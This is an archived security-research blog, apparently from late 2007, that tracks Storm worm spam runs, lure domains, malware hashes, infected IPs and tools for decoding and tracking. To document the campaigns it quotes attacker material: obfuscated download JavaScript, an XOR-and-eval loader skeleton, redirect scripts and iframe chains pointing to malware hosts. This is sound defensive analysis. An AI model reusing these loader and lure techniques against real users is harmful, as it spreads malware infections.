Thursday, January 10, 2008

CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since it's well past the new year. The DISOG team is placing bets on the next ruse. I say adult-rated material for February 14th (St. Valentine's Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com


Friday, December 28, 2007

New Year, Recycled Greeting Cards

The Storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally, a false filename has been added as an HTML comment in the page source:
Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );
The unescaped string the JavaScript actually writes into the page is:
<a href="happynewyear2008.exe">
This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):
newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:
happynewyear2008.exe
happy_2008.exe

sony.exe


Wednesday, December 26, 2007

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious afterthought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text-only front page:
Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!
Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded JavaScript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second-rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.


Saturday, December 22, 2007

The silent Storm and Javascript Decoding

It's been a while since I've posted anything. I haven't lost touch, I've just been busy with the upcoming holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet in favor of laying low for a few months and releasing a whole new version of the code, one with fewer bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid-November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write-up here. In fact, Daniel sparked my interest in decoding malicious JavaScript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic JavaScript decoder, which you can freely download and use. It is coded with an eye towards Unix-flavored OSes, but should work fine if you have SpiderMonkey installed for Windows and don't mind modifying the code slightly. Jsdecode is a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most malicious JavaScript can be decoded by simply running it through this script. So far I've only had a handful of malicious scripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, modifies eval statements so they print to the screen, and reruns the decoded JavaScript to make sure it's not just double-encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)


Thursday, November 15, 2007

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded JavaScript. It decodes to:
<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

The site opened by the JavaScript (screenshot not preserved):

The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.


Thursday, November 08, 2007

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat - you will get attacked, and Storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, it's easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally, that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. It's certainly not recommended for those who are new to the arena.

CME711-Track is a Perl script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple: it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a timestamped entry to the log. Such logs can be used as blocklists, or to track infected hosts.

I over-commented the code on purpose. I had hoped those new to Perl and the world of botnet tracking would download it and learn how things work. Plain-text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manner.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a Perl interpreter, which includes Windows. However, it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual Windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.


Saturday, October 20, 2007

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by MITRE, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with half a dozen or fewer lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third-party software, the authors of this trojan have left a special treat - a JavaScript ripped from the MPack exploit kit.

When an unpatched user visits an MPack-infected site, they are infected with a host of malware. No user interaction beyond loading the page is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer-to-peer technology as many file sharing applications like Gnutella and eDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer-to-peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses double fast-flux DNS to keep researchers from shutting down the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology; to add to the misery, the code morphs every 30 to 60 seconds, so you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos's rootkit detector and GMER both detected the hidden files after reboot, but neither detected them on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the dir command. You are also able to do this from the GUI; however, the results are a little less obvious.

For this test, click Start -> Run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen; you will just be dropped to a blank line below your copy con command. Type something random and press Enter. Then press the F6 key (which inserts the ^Z end-of-file marker) and press Enter. You will see ^Z and '1 file(s) copied.' and you will be returned to your command prompt (C:\Documents and Settings\whatever\>). What you've just done is create a file containing whatever text you typed on the blank line, just like creating a new file in Notepad and saving it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network; however, the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine did not participate with the botnet any longer. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privileged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. It's doubtful they changed the name based on this blog post. More likely it was just good timing. I just grabbed a new binary and it's still using spooldr.* - to be safe, try all three filenames.


Thursday, October 18, 2007

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing about the latest Storm (CME711) pump-and-dumps, which are coming as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads


Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, CME711's domains are all resolving to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamondbacks, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null-routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your DNS servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.


Friday, October 12, 2007

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDoS attacks, or spreading 'spa-m-alware' (mostly the latter, since our SMTP honeypot is set up to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the ruse 'a funny cat e-card.'

Lending an air of credibility to the scam, SuperLaugh.com, which is a legitimate e-card site, also has a file called SuperLaugh.exe, downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe with an MD5 sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legitimate file is harmless.

Malware page: (screenshot not preserved)

Legit page: (screenshot not preserved)

(The pages are both animations; the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static HTML code, the authors are also attaching the MPack XOR'd JavaScript to the end of their pages. The JavaScript will attempt to exploit several old vulnerabilities within Windows and third-party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISPs are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null-routing those domains. We're still getting activity on the following domains:
ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com
We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information, we believe he launched a joe job attack as described in the last blog entry.

We've seen researchers using Tor to capture binaries or communicate with the network, we see denial of service attacks on high-profile IPs, probably related to researchers' honeypots, and we suspect we've seen a few attempted takeover attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second-rate script kiddie.



Friday, September 28, 2007

Stormworm - iframe hell.

This morning we started receiving dual-language Storm worm emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
(Russian: "Look what they're writing about you, you bitch, everyone look! Here's the address")
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't serve anything yet (404 error); however, there is an index page and it has JavaScript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4


the sid=1, sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php


sid=4 is a JavaScript-encoded page that tries to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php returns a lot of PHP errors (the script can't open its redirect list, so its output leaks the server path):

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an MPack landing page that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fast-flux --yet.

space-sms.info, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.


Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT, Randy V noticed the domains started rotating IPs less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) and is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). It's not using any of the XOR'd JavaScript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'


Thursday, September 06, 2007

CME711 (Storm) using Tor ruse

This morning I woke up to the latest storm page...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width="500">
<tr><td><img src="img/tor1.gif"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan="2">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
</td></tr>
</table>
</body>
</html>
The text is a word-for-word cut and paste from the official Tor website, tor.eff.org.

In summary, they're wagering on more clicks by offering The Onion Router (Tor) proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included Tor in the download!

The files file.php, sony.exe and tor.exe are still being served, while video.exe, setup.exe and labor.exe are no longer available.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/


Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with Storm's fast-flux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note: many IPs have been cleaned already; they are posted here for historical purposes only)


Monday, September 03, 2007

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading Windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe
sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:

413801f06694ad17a7fa03508317fdac labor.exe
4f69c5550a497a02e0f690945925f398 labor.exe
024bf16416645df65358777b214d7997 labor.exe
2aa54149fcfc7ebaa960a8d5648d7dbb labor.exe
6cd2ed30fc3653f241b0702ef4c6f3c6 labor.exe
95b57c8cf2022317aafca06dae2d14be labor.exe
352cf8ef2bbca763d2d03e83fb86c9fd labor.exe
781e08a5dcc2c53646ed097e533d6659 labor.exe
accc4e975b8ab70b4286d113fe5e09dc labor.exe
7375b5c6614cf1a24713949a2ea9800a labor.exe
d43611911af1f7a2401faab91214c2bc labor.exe
cbe59b6688925857ab76301ce61919e5 labor.exe
0b9b061d368763ab51bf6d78f3c36086 labor.exe
651709024ebb9b830fdb9fca161348ae labor.exe

Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.


Saturday, September 01, 2007

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:
<iframe src="http://kqfloat.com/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
I spent a few minutes looking at the code this evening...
Downloads XOR'd JavaScript (as usual) ->

function xor_str(plain_str, xor_key) {
    var xored_str = "";
    for (var i = 0; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
function kaspersky(suck,dick){};
function kaspersky2(suck_dick,again){};
var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the user agent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)


Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:
File setup.exe received on 09.01.2007 17:54:57 (CET)

Antivirus          Version        Last Update  Result
AhnLab-V3          2007.9.1.0     2007.09.01   Win32/Zhelatin.worm.138240.B
AntiVir            7.4.1.66       2007.08.31   Worm/Zhelatin.HJ
Authentium         4.93.8         2007.09.01   W32/Tibs.XB
Avast              4.7.1029.0     2007.09.01   Win32:Tibs-BCY
AVG                7.5.0.484      2007.08.31   Generic6.WTZ
BitDefender        7.2            2007.09.01   Trojan.Peed.PB
CAT-QuickHeal      9.00           2007.09.01   -
ClamAV             0.91.2         2007.09.01   -
DrWeb              4.33           2007.09.01   BackDoor.Groan
eSafe              7.0.15.0       2007.08.29   -
eTrust-Vet         31.1.5100      2007.08.31   Win32/Pecoan
Ewido              4.0            2007.09.01   -
FileAdvisor        1              2007.09.01   -
Fortinet           3.11.0.0       2007.09.01   W32/Tibs@mm
F-Prot             4.3.2.48       2007.08.31   W32/Tibs.XB
F-Secure           6.70.13030.0   2007.08.31   Email-Worm.Win32.Zhelatin.hj
Ikarus             T3.1.1.12      2007.09.01   Backdoor.Win32.Agent.amd
Kaspersky          4.0.2.24       2007.09.01   Email-Worm.Win32.Zhelatin.hj
McAfee             5110           2007.08.31   W32/Nuwar@MM
Microsoft          1.2803         2007.09.01   -
NOD32v2            2495           2007.09.01   -
Norman             5.80.02        2007.08.31   W32/Tibs.dam
Panda              9.0.0.4        2007.09.01   Trj/Alanchum.MV
Prevx1             V2             2007.09.01   -
Rising             19.38.52.00    2007.09.01   Worm.Mail.Win32.Zhelatin.dau
Sophos             4.21.0         2007.09.01   W32/Bagz-I
Sunbelt            2.2.907.0      2007.08.31   Trojan-Downloader.Win32.Tibs.jy
Symantec           10             2007.09.01   Trojan Horse
TheHacker          6.1.9.175      2007.08.31   W32/Zhelatin.hj
VBA32              3.12.2.3       2007.09.01   Email-Worm.Win32.Zhelatin.hj
VirusBuster        4.3.26:9       2007.09.01   I-Worm.Zhelatin.AA
Webwasher-Gateway  6.0.1          2007.08.31   Worm.Zhelatin.HJ

Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600
(VirusTotal results, http://www.virustotal.com)
As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.


Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:
Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first we've seen that include the recipient's account name in the message body. People may be more inclined to trust them because they appear targeted.


Saturday, August 25, 2007

Dude, what if your wife finds this?!

The latest Storm run uses plain HTTP links whose visible text is a legitimate-looking URL while the actual href points at an infected host's IP address.

This is actually good news for us, because most spam filters will catch it. Turning off HTML display in your email client will help you identify tricks like this:

Subject: Dude, what if your wife finds this?

From: <laura@trisection.com>
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>
Sender: User guzjxoepu <guzjxoepu@wfvy>
Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a
href="http://xx.xx.x.xxx/">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>

The latest run serves video.exe and displays a static YouTube logo. Requests for the earlier filenames (ecard.exe, msdataaccess.exe and applet.exe) now return a 404 error.
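The check a mail filter or a curious recipient would want for the trick above, as an added example that is not part of the original post: pull every anchor out of an HTML body and flag those whose visible text is a URL on one host while the real href goes somewhere else, or whose href is a bare IP address, as in the sample message. The message body below is constructed for the example, modelled on the sample; 192.0.2.10 and example.test are placeholders, not indicators from the post.

```javascript
// Added example (not part of the DISOG post): detect HTML e-mail links whose
// visible text is a URL that does not match the actual href, the pattern used
// by the "what if your wife finds this" run (youtube.com text, bare-IP href).

// Constructed message body modelled on the sample in the post; the first
// anchor is the Storm pattern, the other two are benign controls.
const SAMPLE_BODY =
  '<html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... ' +
  '<a href="http://192.0.2.10/">http://www.youtube.com/watch?v=12xM6esvMXs</a> ' +
  '<a href="http://postcards.com/">http://postcards.com/</a> ' +
  '<a href="http://example.test/card">click here</a></body></html>';

// Minimal anchor extractor; real mail is messier, but Storm's templates were simple.
const ANCHOR_RE = /<a\b[^>]*?href\s*=\s*["']?([^"'\s>]+)["']?[^>]*>([\s\S]*?)<\/a>/gi;

// Hostname of a URL, or null when the string is not a URL at all
// (which is what "click here" style anchor text gives).
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

function isBareIp(host) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host || '');
}

// Returns [{ href, text }] for every anchor in the body, inner tags stripped.
function extractLinks(html) {
  const links = [];
  ANCHOR_RE.lastIndex = 0;
  let m;
  while ((m = ANCHOR_RE.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, '').trim() });
  }
  return links;
}

// One link -> verdict with the reasons it was flagged.
function classifyLink(link) {
  const hrefHost = hostOf(link.href);
  const textHost = hostOf(link.text);      // non-null only if the visible text is itself a URL
  const reasons = [];
  if (isBareIp(hrefHost)) {
    reasons.push('href points at a bare IP address');
  }
  if (textHost && hrefHost && textHost !== hrefHost) {
    reasons.push('visible URL host (' + textHost + ') differs from real host (' + hrefHost + ')');
  }
  return { href: link.href, text: link.text, suspicious: reasons.length > 0, reasons };
}

// Everything in the body worth a second look.
function suspiciousLinks(html) {
  return extractLinks(html).map(classifyLink).filter(l => l.suspicious);
}
```

The postcards.com control shows why both tests matter: a link whose text and href agree on the host is left alone, and a plain "click here" anchor is only flagged when its href is a raw IP.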

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats and Comcast Communications, as well as to various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US Cert has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
